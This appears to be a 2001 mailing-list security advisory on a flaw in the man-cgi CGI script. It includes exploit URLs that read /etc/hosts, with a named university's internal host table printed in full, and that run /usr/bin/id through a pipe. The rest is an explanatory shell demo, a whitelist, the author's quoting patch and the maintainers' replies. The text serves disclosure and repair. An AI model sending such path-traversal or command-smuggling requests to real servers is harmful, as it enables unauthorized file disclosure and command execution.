Upon researching several possible CGI-based man holes I ran across the
following bugged code:
© 1994-1999 Man-cgi 2.00, Panagiotis Christias
<[email protected]>
© 1995 Man-cgi 1.15 Modified for Solaris 2.3, David Adams,
<[email protected]>
© 1994 Man-cgi 1.15, Panagiotis Christias
<[email protected]>
© 1996 Man-cgi 1.15 Ported to linux and maintained by, Tom Vrana
<[email protected]>
The issue is with the filtering of %20 (or any other hex-encoded character) in
the URL: in addition to a known file name, it will allow you to view the file
with the permissions of the web server. In some implementations it is also
possible to specify the path to a known executable and thus run it, for
example /usr/bin/id. These issues may be used to disclose sensitive
information on your server or possibly allow someone to run any command they
want on it. If you have further questions, mail me.
----------------------------------------------------------
http://www.ntua.gr/cgi-bin/man-cgi?%20/etc/hosts%20
reveals the following
#
# Internet host table
#
127.0.0.1 localhost
#147.102.222.210 achilles.noc.ntua.gr achilles
147.102.222.210 achilles.noc.ntua.gr achilles
147.102.222.211 patroklos.noc.ntua.gr patroklos
147.102.222.230 ulysses.noc.ntua.gr ulysses
# Required for backup
147.102.222.250 menelaos.noc.ntua.gr menelaos
-----------------------------------------------------------
http://xxx/cgi-bin/man-cgi?/usr/bin/id
or
http://xxx/cgi-bin/man-cgi?|/usr/bin/id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
-----------------------------------------------------------
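To make the mechanism behind the %20 trick concrete, here is an added shell example (not man-cgi's own code). It models the awk invocation at the end of the script, where the awk program is followed by PAGE=... and URL=... assignments, using a constructed stand-in file and constructed man output so it runs offline. The page does not show which line of the script runs /usr/bin/id, so the example only reproduces the file read and adds an assumed whitelist (valid_page) that rejects both of the queries shown above before they reach any command.

```shell
#!/bin/sh
# Added example, not man-cgi's own code. Models the awk call at the end
# of the script with constructed input so it can run offline.

# Constructed stand-in for a sensitive file such as /etc/hosts.
DEMO_FILE="${TMPDIR:-/tmp}/man-cgi-demo.$$"
printf '127.0.0.1 localhost\n' > "$DEMO_FILE"
trap 'rm -f "$DEMO_FILE"' EXIT

# Constructed stand-in for the man page text that man-cgi pipes into awk.
MAN_OUTPUT='MAN(1) Manual pager'

# Vulnerable shape: PAGE=$COMMAND is unquoted. After word splitting, awk
# sees "PAGE=" and then each remaining word; a word without "=" is an
# input file name, so a query of "%20/etc/hosts%20" makes awk print that
# file instead of the piped man output.
vulnerable_render() {
    COMMAND=$1
    # shellcheck disable=SC2086  (unquoted on purpose, as in the original)
    printf '%s\n' "$MAN_OUTPUT" |
        awk '{ print } END { printf("page=[%s]\n", PAGE) }' PAGE=$COMMAND
}

# The author's one-line fix: quoting keeps the whole query inside the
# single PAGE=... assignment, so awk reads stdin as intended.
quoted_render() {
    COMMAND=$1
    printf '%s\n' "$MAN_OUTPUT" |
        awk '{ print } END { printf("page=[%s]\n", PAGE) }' PAGE="$COMMAND"
}

# Defence in depth (assumed here, not from the page): accept only the
# characters that can appear in a man page name, so "/etc/hosts",
# "|/usr/bin/id" and whitespace never reach awk or any other command.
valid_page() {
    case $1 in
        ''|*[!A-Za-z0-9._+-]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Validate first, then render with the quoted assignment.
hardened_render() {
    valid_page "$1" || { printf 'rejected: bad page name\n'; return 1; }
    quoted_render "$1"
}

# Demonstration with the page's two malicious queries (URL-decoded).
vulnerable_render " $DEMO_FILE "      # prints the file's contents
quoted_render " $DEMO_FILE "          # prints the man output only
hardened_render '|/usr/bin/id' || :   # rejected before anything runs
hardened_render 'id'                  # a normal page name passes
```

The whitelist is deliberately stricter than quoting alone: quoting fixes this one awk call, but a value validated once at the top of the script stays safe in every later expansion, including the ones the author says still need correcting.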
Below are the author's patch and comments from one of the people who have
modified the script to operate on other OSes.
Sorry for my delayed reply, too much work to do and too much email
to read and reply. Here is a quick fix:
***************
*** 185,191 ****
{ print "<HR align=left width=640 size=2 noshade>"; \
printf("<B>NOTE:</b> man page for %s may be in the wrong place.
\n",PAGE); \
printf("<A HREF=\"%s?%s+ANY\">Try all sections and all optional
pages</a>\n",URL,PAGE); } }' \
! PAGE=$COMMAND URL=$MANCGI
fi;
---- 178,184 ----
{ print "<HR align=left width=640 size=2 noshade>"; \
printf("<B>NOTE:</b> man page for %s may be in the wrong place.
\n",PAGE); \
printf("<A HREF=\"%s?%s+ANY\">Try all sections and all optional
pages</a>\n",URL,PAGE); } }' \
! PAGE="$COMMAND" URL="$MANCGI"
fi;
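Review bot: quoting `PAGE="$COMMAND"` and `URL="$MANCGI"` is the right minimal fix for these two words, because everything after the awk program text is parsed by awk itself: each `name=value` word is a variable assignment and any other word is an input file to read. With the unquoted `PAGE=$COMMAND`, a $COMMAND of ` /etc/hosts ` (the decoded `%20/etc/hosts%20` from the report) word-splits into `PAGE=` and `/etc/hosts`, so awk prints that file in place of the man output; the quoted form keeps the whole value inside one assignment. Two follow-ups: the same quoting is needed at every other expansion of $COMMAND and $MANCGI in the script, and $COMMAND should be validated against the characters allowed in a man page name before it is used at all, since the `|/usr/bin/id` query shown above was able to run a program, which quoting this one line does not address.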
The values of the PAGE and URL variables should be quoted. This is the first
step. I should correct several other parts of the script. I was quite naive
when I wrote man-cgi several years ago :)
You're welcome to test the security of http://www.ntua.gr/cgi-bin/man-cgi
Regards,
Panagiotis
--
Panagiotis J. Christias Network Management Center
[email protected] National Technical Univ. of Athens, GREECE
----------------------------------------------------------------
On Thu, Feb 22, 2001 at 10:52:41AM -0000, David Adams wrote:
Sorry to be so dim, but I really could not fathom the point you were trying
to make with your first email. Only now do I understand the significance of
putting in the %20 (space character). I still don't understand your
anonymity, but I guess I can live with it.
The man-cgi script was written by Panagiotis Christias, and I made some
enhancements and got it working for Solaris. It works so well that no one
(AFAIK) has bothered to re-write it for Perl.
I am grateful that you have pointed out this security loophole to us.
It is up to you whether you report it through the normal channels or not.
As it can be used to read the /etc/passwd file it could be a real security
threat. I will look at the script and see if I can find a solution; I hope
Panagiotis will do the same.
--
David Adams
Computing Services
Southampton University